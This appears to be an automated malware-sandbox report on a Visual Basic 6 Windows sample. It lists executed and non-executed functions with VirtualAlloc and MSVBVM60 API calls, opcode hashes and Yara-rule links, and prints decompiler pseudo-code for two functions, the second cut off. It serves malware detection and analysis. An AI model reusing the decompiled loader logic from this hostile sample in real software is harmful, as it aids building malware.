        • Instruction Fuzzy Hash: D1F039E2B9DC04DAF9052A924381A372559D39B3789B49733A50B380C164FD0B037FAF
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004058D1, Relevance: 1.3, APIs: 1, Instructions: 44memoryCOMMON
        Download Yara Rule
        APIs
        • VirtualAlloc.KERNELBASE(00000000,-0003A040,000006E0,-00000081), ref: 00405A6E
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: AllocVirtual
        • String ID:
        • API String ID: 4275171209-0
        • Opcode ID: 4886a368a7e95b6adf835affbf5073d3fe92686385c494f4a477ddde66520988
        • Instruction ID: 6037a51b44b506a1e01192b03118c6c2f3a15f855b93000293763ef4cb796f2c
        • Opcode Fuzzy Hash: 4886a368a7e95b6adf835affbf5073d3fe92686385c494f4a477ddde66520988
        • Instruction Fuzzy Hash: F2F06DE2B9EC04D9FA05199243809372519E38B3745B09737950B780C168FE0B033F9F
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00405977, Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
        Download Yara Rule
        APIs
        • VirtualAlloc.KERNELBASE(00000000,-0003A040,000006E0,-00000081), ref: 00405A6E
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: AllocVirtual
        • String ID:
        • API String ID: 4275171209-0
        • Opcode ID: 62adb37aaeab0fceb0bceb88a9347b310e9a7b901e31a0b63711f1338febf30f
        • Instruction ID: 5c093e71ca15f9a9b644c696e41979e4f6772c76508665a4f9b20952eaeac5cf
        • Opcode Fuzzy Hash: 62adb37aaeab0fceb0bceb88a9347b310e9a7b901e31a0b63711f1338febf30f
        • Instruction Fuzzy Hash: 1BE01A4138ED04D9E90144A55BC0A37760ED38B7B093557B7A017784C16EBE23033EAF
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00405940, Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
        Download Yara Rule
        APIs
        • VirtualAlloc.KERNELBASE(00000000,-0003A040,000006E0,-00000081), ref: 00405A6E
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: AllocVirtual
        • String ID:
        • API String ID: 4275171209-0
        • Opcode ID: 99e217a60f1e690e9a7c9c0c39ef67a6f11d3f43738d0868e09de64b6ccc3ff8
        • Instruction ID: e03477bd0ef5b766cc95beca6d37356b5fcd47259f96fdf1adc96fc7987f1515
        • Opcode Fuzzy Hash: 99e217a60f1e690e9a7c9c0c39ef67a6f11d3f43738d0868e09de64b6ccc3ff8
        • Instruction Fuzzy Hash: DAE0929179DD04E9F905559647C1A3B2419D39B3749749733A51B780C164BD0B033EAF
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004059FC, Relevance: 1.3, APIs: 1, Instructions: 35memoryCOMMON
        Download Yara Rule
        APIs
        • VirtualAlloc.KERNELBASE(00000000,-0003A040,000006E0,-00000081), ref: 00405A6E
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: AllocVirtual
        • String ID:
        • API String ID: 4275171209-0
        • Opcode ID: b59d4aa7c158818ee16afe93366d18ee3aa81c20ca404bbe5f43bf4c96c36c7b
        • Instruction ID: 5a5320333e3790834d7d43f3606783cee957f23d27e22fae16c3d18a9beba903
        • Opcode Fuzzy Hash: b59d4aa7c158818ee16afe93366d18ee3aa81c20ca404bbe5f43bf4c96c36c7b
        • Instruction Fuzzy Hash: 8FF0D06065D9C1CCD71352B807D152B6F26C8B6114278D2FFC49B23183C86D810B7F97
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040598E, Relevance: 1.3, APIs: 1, Instructions: 30memoryCOMMON
        Download Yara Rule
        APIs
        • VirtualAlloc.KERNELBASE(00000000,-0003A040,000006E0,-00000081), ref: 00405A6E
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: AllocVirtual
        • String ID:
        • API String ID: 4275171209-0
        • Opcode ID: a9cacc84331a35fc57f8c31b0b15c23a1fa4181e944422366ab61a61c8c02552
        • Instruction ID: 5fd74720f2bd9097e59c65a99179aedf091b83c0f12bd199af967d484e0ceb3d
        • Opcode Fuzzy Hash: a9cacc84331a35fc57f8c31b0b15c23a1fa4181e944422366ab61a61c8c02552
        • Instruction Fuzzy Hash: 65E0E25078DD01DAEA06459546C5A3BB529E38A3A0A3893739017380C069BD03433E9F
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004059AE, Relevance: 1.3, APIs: 1, Instructions: 26memoryCOMMON
        Download Yara Rule
        APIs
        • VirtualAlloc.KERNELBASE(00000000,-0003A040,000006E0,-00000081), ref: 00405A6E
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: AllocVirtual
        • String ID:
        • API String ID: 4275171209-0
        • Opcode ID: c2db7830144fd79bd54daee7219feda184be77965b83de145059a077ed9c9a6b
        • Instruction ID: 2742e7ca925ac53d070b6a1d26d12fa4ba691b86b681995282a76a73c7d9a460
        • Opcode Fuzzy Hash: c2db7830144fd79bd54daee7219feda184be77965b83de145059a077ed9c9a6b
        • Instruction Fuzzy Hash: 82D01C4478CD00DAEA0284AA42C1A3B2919E3CB3B0938A333900B390C068FD03073EAF
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004059E2, Relevance: 1.3, APIs: 1, Instructions: 24memoryCOMMON
        Download Yara Rule
        APIs
        • VirtualAlloc.KERNELBASE(00000000,-0003A040,000006E0,-00000081), ref: 00405A6E
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: AllocVirtual
        • String ID:
        • API String ID: 4275171209-0
        • Opcode ID: ad13d95f49f7f79a74bc85fc7d90dc679cd2190b359297cbd455de785fca2ba9
        • Instruction ID: e892348d27eb5a5b3cdbf394e5c1b6b5967f4d002e60824b85738d060f41bf7b
        • Opcode Fuzzy Hash: ad13d95f49f7f79a74bc85fc7d90dc679cd2190b359297cbd455de785fca2ba9
        • Instruction Fuzzy Hash: 1CD01701BACE04CBD601449552C043B2C98D5CA3A8374EB33A01B710C0A8FC03433E9F
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00405A42, Relevance: 1.3, APIs: 1, Instructions: 22memoryCOMMON
        Download Yara Rule
        APIs
        • VirtualAlloc.KERNELBASE(00000000,-0003A040,000006E0,-00000081), ref: 00405A6E
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: AllocVirtual
        • String ID:
        • API String ID: 4275171209-0
        • Opcode ID: ae545ab05ec70868acc1c53d78555ef54e3d422eab79210a54050c3473058129
        • Instruction ID: 461fedfd8fc12a8237a1fc6f66e2aa45f1cc9515754ee4b48de90f472beb287d
        • Opcode Fuzzy Hash: ae545ab05ec70868acc1c53d78555ef54e3d422eab79210a54050c3473058129
        • Instruction Fuzzy Hash: 80D01251B5DB51CAE24201A204D05273B6AD8A721033893B3C843AE4D3D5AC0607AE7B
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00405A57, Relevance: 1.3, APIs: 1, Instructions: 21memoryCOMMON
        Download Yara Rule
        APIs
        • VirtualAlloc.KERNELBASE(00000000,-0003A040,000006E0,-00000081), ref: 00405A6E
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: AllocVirtual
        • String ID:
        • API String ID: 4275171209-0
        • Opcode ID: 573830227737cb30ad7cfbb00179ff276ea65e26a4cbf1227e7079ec066a26d6
        • Instruction ID: 73bac85e138ee93f461d776a866618cf63559bdd3d61e342f4b5f8cb3f4d4ca7
        • Opcode Fuzzy Hash: 573830227737cb30ad7cfbb00179ff276ea65e26a4cbf1227e7079ec066a26d6
        • Instruction Fuzzy Hash: C4D0A2217CCE7A8DE70A61680C816BB7517A1C53547B886738053AB0CBD66D85833D9F
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        Function 00403D4F, Relevance: .5, Instructions: 484COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: f31d72d248e826b31a630566af4e014d54a3cf3667611e23f9903ef1e963fb25
        • Instruction ID: be27dcf71e22f66555146710453ef6d832721ec95d21bbc8b1866c2dc1b9dcc7
        • Opcode Fuzzy Hash: f31d72d248e826b31a630566af4e014d54a3cf3667611e23f9903ef1e963fb25
        • Instruction Fuzzy Hash: D5B123EA3CF140DBF1021A6892541BABA68EBCB72537064B7C707754C1DABD06437A9F
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040425D, Relevance: .3, Instructions: 324COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 6c706b3b45daa34cdd930f1b103e6a96355178094a764fa8827cb192314eeda8
        • Instruction ID: 93504bdb3649648bb69fffd0f1533527691741f7b5ae9f501f0abbea8d3f62df
        • Opcode Fuzzy Hash: 6c706b3b45daa34cdd930f1b103e6a96355178094a764fa8827cb192314eeda8
        • Instruction Fuzzy Hash: 4F71DDE93CF500EAF0022959921417AB564EBCBB5037064B7CB17755C1AEFD0A433A9F
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00461068, Relevance: .3, Instructions: 296COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.1327620350.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: false
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: f1ebedc86744f1f8fd90d98f1b87069a02403ee342d4fcd17ab8d873d569c1f1
        • Instruction ID: 03578c387fbb7f8bf7dc968352937aac3b3ffdcb87562e2f1c11c1e1526bda71
        • Opcode Fuzzy Hash: f1ebedc86744f1f8fd90d98f1b87069a02403ee342d4fcd17ab8d873d569c1f1
        • Instruction Fuzzy Hash: 59B1C271700602AFE718DF28CC91BD6B3A4FF08354F19822AEC5993751EB78AC558BD6
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00463D88, Relevance: .2, Instructions: 228COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.1327620350.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: false
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: c83cc2946efbe916f5beef89de2d9b3f0e5af5d0bb9a863d68feb9cd21c13d45
        • Instruction ID: 56334a41d91f806d03bc7ab628a8890630f38799ceb3ee561c781b4458c418a6
        • Opcode Fuzzy Hash: c83cc2946efbe916f5beef89de2d9b3f0e5af5d0bb9a863d68feb9cd21c13d45
        • Instruction Fuzzy Hash: 5881A8709043928EDF25DF28C4D4756BBE09F62324F14829BD9968B3D7E3798982C71B
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00405DCE, Relevance: .2, Instructions: 172COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 936d50d2473bf37781f83b23384c59b2a3e86705c45ad7534309119ea624e85c
        • Instruction ID: 93ff2f2bb26d62abcb609efe6e6d9c7f6e803cae57706e80f72d43490d161f0e
        • Opcode Fuzzy Hash: 936d50d2473bf37781f83b23384c59b2a3e86705c45ad7534309119ea624e85c
        • Instruction Fuzzy Hash: 5A41A731589911CBE60A6B1687401BBBB14EA42B64371007FC9C77E0C6D6BD0223BECF
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00463D97, Relevance: .2, Instructions: 159COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.1327620350.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: false
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 1921a26d94352b2a20c89b6cb751ddce82bb1ea8d15302a163699266ee7972e7
        • Instruction ID: 3d1fb3d63623e7f43a0cc198456d10615e1b421b3c48ca7afb494b8b03e74dea
        • Opcode Fuzzy Hash: 1921a26d94352b2a20c89b6cb751ddce82bb1ea8d15302a163699266ee7972e7
        • Instruction Fuzzy Hash: E951C9709043828EDB25DF28C4C4752BBE19F66324F1582AAD9958F3E7E3358946C727
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004613DF, Relevance: .1, Instructions: 99COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.1327620350.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: false
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 7539e7494e9f48276d6724211ea06afefd1451b4a1031392ab8f991272290371
        • Instruction ID: f678a19a23ad06ce65ce4eb95b22b7b05223cd27dfaf734045c507ee740598b5
        • Opcode Fuzzy Hash: 7539e7494e9f48276d6724211ea06afefd1451b4a1031392ab8f991272290371
        • Instruction Fuzzy Hash: 6131F8717006019BD794AE28CC51BA5B3E4FF44724F19422AFC5AD7361EF28EC458B85
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00406E03, Relevance: .1, Instructions: 87COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 2025a9a44d3e51e0291b7b6b948e95191b032f30cedb04b41d48fc77cb869826
        • Instruction ID: 884ac289c86a63819e793e32e20a867af4da51a58eb107f6fbc1164f7a8acd5d
        • Opcode Fuzzy Hash: 2025a9a44d3e51e0291b7b6b948e95191b032f30cedb04b41d48fc77cb869826
        • Instruction Fuzzy Hash: B521A136A4C7309ACA1486F2D7021673BE5E9537A8329507FE023692E3C57A8123E5CE
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00406EE2, Relevance: .1, Instructions: 65COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: f7471c321e24e54b471becf922ea5cfb57c671da0393d74120f38706099c259b
        • Instruction ID: 26cba47c5f5885d00893c950e661c8529454d80808ef112a0211a908fe5d2bef
        • Opcode Fuzzy Hash: f7471c321e24e54b471becf922ea5cfb57c671da0393d74120f38706099c259b
        • Instruction Fuzzy Hash: 2601E475D9E602E9EE00162576108B76AE0A62735437363B3C5173D0E3817F2A23FA5F
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004637AD, Relevance: .0, Instructions: 26COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.1327620350.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: false
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 334e946c658475618d3e9590c12d80f0cc853cf912d4231a130149afb864f032
        • Instruction ID: 6e0c1cbf2768bed8d3ec77376969dc865fa5406990097ed23030854707141d69
        • Opcode Fuzzy Hash: 334e946c658475618d3e9590c12d80f0cc853cf912d4231a130149afb864f032
        • Instruction Fuzzy Hash: 27F0C9B5310280CFC714EE18C5D0E5AB3E1EF55B12F518566F8128BBA2E328EE45D61A
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00461E88, Relevance: .0, Instructions: 7COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.1327620350.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: false
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 679af165bd95f411e9ebf628752676d0e9430a9b55404082fdf026a2554bd3f9
        • Instruction ID: a84e00618a41ad80e399370d46f552f0eaf2960307c9abba575c93c9dcca4fdf
        • Opcode Fuzzy Hash: 679af165bd95f411e9ebf628752676d0e9430a9b55404082fdf026a2554bd3f9
        • Instruction Fuzzy Hash: B4B092B63416818FEF02DE28C491B4073B0FB04B84B0904D0E802CB711C228F900CA10
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004632FE, Relevance: .0, Instructions: 4COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.1327620350.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: false
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
        • Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
        • Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
        • Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00414138, Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 154COMMON
        Download Yara Rule
        C-Code - Quality: 46%
        			E00414138(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v44;
				char _v52;
				char _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				char* _v80;
				intOrPtr _v88;
				intOrPtr* _v92;
				signed int _v96;
				short _v100;
				intOrPtr* _v108;
				signed int _v112;
				char _v116;
				signed int _v120;
				char* _t64;
				signed int _t68;
				signed int _t69;
				char* _t76;
				signed int _t84;
				intOrPtr _t107;

				_push(0x4012a6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t107;
				_push(0x64);
				L004012A0();
				_v12 = _t107;
				_v8 = 0x401278;
				_v44 = 0x80020004;
				_v52 = 0xa;
				if( *0x415010 != 0) {
					_v108 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v108 = 0x415010;
				}
				_t64 =  &_v36;
				L0040140E();
				_v92 = _t64;
				_t68 =  *((intOrPtr*)( *_v92 + 0x50))(_v92,  &_v28, _t64,  *((intOrPtr*)( *((intOrPtr*)( *_v108)) + 0x300))( *_v108));
				asm("fclex");
				_v96 = _t68;
				if(_v96 >= 0) {
					_v112 = _v112 & 0x00000000;
				} else {
					_push(0x50);
					_push(0x40350c);
					_push(_v92);
					_push(_v96);
					L00401402();
					_v112 = _t68;
				}
				_t69 =  &_v52;
				_push(_t69);
				L0040133C();
				L004013EA();
				_push(_t69);
				_push(_v28);
				L0040137E();
				asm("sbb eax, eax");
				_v100 =  ~( ~_t69 + 1);
				_push( &_v28);
				_push( &_v32);
				_push(2);
				L004013D2();
				L004013DE();
				L004013F0();
				if(_v100 != 0) {
					if( *0x41565c != 0) {
						_v116 = 0x41565c;
					} else {
						_push(0x41565c);
						_push(0x4036a4);
						L00401408();
						_v116 = 0x41565c;
					}
					_t34 =  &_v116; // 0x41565c
					_v92 =  *((intOrPtr*)( *_t34));
					_v80 = L"Delicate";
					_v88 = 8;
					_v64 = 0x13;
					_v72 = 2;
					L004012A0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L004012A0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t84 =  *((intOrPtr*)( *_v92 + 0x38))(_v92, 0x10, 0x10,  &_v52);
					asm("fclex");
					_v96 = _t84;
					if(_v96 >= 0) {
						_v120 = _v120 & 0x00000000;
					} else {
						_push(0x38);
						_push(0x403694);
						_push(_v92);
						_push(_v96);
						L00401402();
						_v120 = _t84;
					}
					_push( &_v52);
					_push( &_v56);
					L00401330();
					_push( &_v56);
					_push( &_v24);
					L00401336();
					L004013F0();
				}
				_push(0x41434b);
				_t76 =  &_v24;
				_push(_t76);
				_push(0);
				L004013A8();
				return _t76;
			}





























        0x0041413d
        0x00414148
        0x00414149
        0x00414150
        0x00414153
        0x0041415b
        0x0041415e
        0x00414165
        0x0041416c
        0x0041417a
        0x00414194
        0x0041417c
        0x0041417c
        0x00414181
        0x00414186
        0x0041418b
        0x0041418b
        0x004141af
        0x004141b3
        0x004141b8
        0x004141c7
        0x004141ca
        0x004141cc
        0x004141d3
        0x004141ec
        0x004141d5
        0x004141d5
        0x004141d7
        0x004141dc
        0x004141df
        0x004141e2
        0x004141e7
        0x004141e7
        0x004141f0
        0x004141f3
        0x004141f4
        0x004141fe
        0x00414203
        0x00414204
        0x00414207
        0x0041420e
        0x00414213
        0x0041421a
        0x0041421e
        0x0041421f
        0x00414221
        0x0041422c
        0x00414234
        0x0041423f
        0x0041424c
        0x00414266
        0x0041424e
        0x0041424e
        0x00414253
        0x00414258
        0x0041425d
        0x0041425d
        0x0041426d
        0x00414272
        0x00414275
        0x0041427c
        0x00414283
        0x0041428a
        0x00414298
        0x004142a2
        0x004142a3
        0x004142a4
        0x004142a5
        0x004142a9
        0x004142b3
        0x004142b4
        0x004142b5
        0x004142b6
        0x004142bf
        0x004142c2
        0x004142c4
        0x004142cb
        0x004142e4
        0x004142cd
        0x004142cd
        0x004142cf
        0x004142d4
        0x004142d7
        0x004142da
        0x004142df
        0x004142df
        0x004142eb
        0x004142ef
        0x004142f0
        0x004142f8
        0x004142fc
        0x004142fd
        0x00414305
        0x00414305
        0x0041430a
        0x0041433f
        0x00414342
        0x00414343
        0x00414345
        0x0041434a

        APIs
        • __vbaChkstk.MSVBVM60(?,004012A6), ref: 00414153
        • __vbaNew2.MSVBVM60(00402AA4,00415010,?,?,?,?,?,?,?,?,?,004012A6), ref: 00414186
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 004141B3
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040350C,00000050), ref: 004141E2
        • #646.MSVBVM60(0000000A), ref: 004141F4
        • __vbaStrMove.MSVBVM60(0000000A), ref: 004141FE
        • __vbaStrCmp.MSVBVM60(?,00000000,0000000A), ref: 00414207
        • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,0000000A), ref: 00414221
        • __vbaFreeObj.MSVBVM60 ref: 0041422C
        • __vbaFreeVar.MSVBVM60 ref: 00414234
        • __vbaNew2.MSVBVM60(004036A4,0041565C), ref: 00414258
        • __vbaChkstk.MSVBVM60(?), ref: 00414298
        • __vbaChkstk.MSVBVM60(?), ref: 004142A9
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403694,00000038), ref: 004142DA
        • __vbaVar2Vec.MSVBVM60(?,?), ref: 004142F0
        • __vbaAryMove.MSVBVM60(?,?,?,?), ref: 004142FD
        • __vbaFreeVar.MSVBVM60(?,?,?,?), ref: 00414305
        • __vbaAryDestruct.MSVBVM60(00000000,?,0041434B), ref: 00414345
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1327448680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1327420993.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327539472.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: __vba$Free$Chkstk$CheckHresultMoveNew2$#646DestructListVar2
        • String ID: Delicate$\VA
        • API String ID: 3283854751-1193316369
        • Opcode ID: f8251bd69a73d87c271c2259cfda2921de0976e54c4b058a7422a24128a89f6e
        • Instruction ID: 95738c97f18e51842cc9797d2cacd7b3c257c3a9ea5a1a43a4b2c4920dcb8bda
        • Opcode Fuzzy Hash: f8251bd69a73d87c271c2259cfda2921de0976e54c4b058a7422a24128a89f6e
        • Instruction Fuzzy Hash: D85127B1D10608AFDB11EFD1C845BDEBBB9BF48704F50402AF501BB2A1DBB85985CB59
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0041349C, Relevance: 35.1, APIs: 19, Strings: 1, Instructions: 118COMMON
        Download Yara Rule
        C-Code - Quality: 42%
        			E0041349C(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8, void* _a36) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				void* _v40;
				intOrPtr _v48;
				void* _v52;
				char _v56;
				char _v60;
				char _v76;
				char _v92;
				intOrPtr* _v112;
				signed int _v116;
				intOrPtr* _v124;
				signed int _v128;
				char* _t40;
				char* _t44;
				signed int _t48;
				char* _t49;
				intOrPtr _t76;

				_push(0x4012a6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t76;
				_t40 = 0x6c;
				L004012A0();
				_v12 = _t76;
				_v8 = 0x4011d0;
				L00401420();
				L004013D8();
				_push(0x4035fc);
				L004013A2();
				if(_t40 != 1) {
					if( *0x415010 != 0) {
						_v124 = 0x415010;
					} else {
						_push(0x415010);
						_push(0x402aa4);
						L00401408();
						_v124 = 0x415010;
					}
					_t44 =  &_v56;
					L0040140E();
					_v112 = _t44;
					_t48 =  *((intOrPtr*)( *_v112 + 0x1b8))(_v112,  &_v60, _t44,  *((intOrPtr*)( *((intOrPtr*)( *_v124)) + 0x304))( *_v124));
					asm("fclex");
					_v116 = _t48;
					if(_v116 >= 0) {
						_v128 = _v128 & 0x00000000;
					} else {
						_push(0x1b8);
						_push(0x4034fc);
						_push(_v112);
						_push(_v116);
						L00401402();
						_v128 = _t48;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(_v60);
					_t49 =  &_v76;
					_push(_t49);
					L00401414();
					_push(_t49);
					L00401390();
					L004013EA();
					_push(_t49);
					_push( &_v92);
					L00401396();
					_push(0x10);
					L004012A0();
					asm("movsd");
